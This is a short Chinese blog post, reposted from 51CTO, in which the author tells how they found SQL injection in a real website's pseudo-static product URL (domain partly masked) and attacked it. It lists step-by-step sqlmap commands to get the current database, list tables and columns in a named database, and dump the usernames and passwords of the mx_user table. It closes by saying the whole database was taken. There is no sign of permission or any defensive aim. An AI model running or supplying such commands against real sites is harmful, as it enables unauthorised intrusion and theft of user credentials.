今天在学习的过程中发现了一个网站的伪静态含有注入,便对此进行了渗透
利用工具:sqlmap
我在”/id/12.html“上的12后面加上*,然后放在sqlmap上爆
先查看当前的数据库,命令为sqlmap.py -u url --current-db,查看的数据库为下图
1:查看这个数据库里面的表,指定数据库命令为python sqlmap/sqlmap.py -u "http://www.***.com/en/?product/id/12*.html" -D ingenic_en --tables
2:找出表中含有的字段,命令为python sqlmap/sqlmap.py -u "http://www.***.com/en/?product/id/12*.html" -D ingenic_en -T mx_user --columns
3:爆这些字段的内容:name,password,username,命令为python sqlmap/sqlmap.py -u "http://www.***.com/en/?product/id/12*.html" -D ingenic_en -T mx_user -C name,password,username --dump
如上所示,爆出了字段的内容,获得了用户名和密码,密码是需要解密的,最后是拖库
本文转自 towardly 51CTO博客,原文链接:http://blog.51cto.com/brighttime/1918427
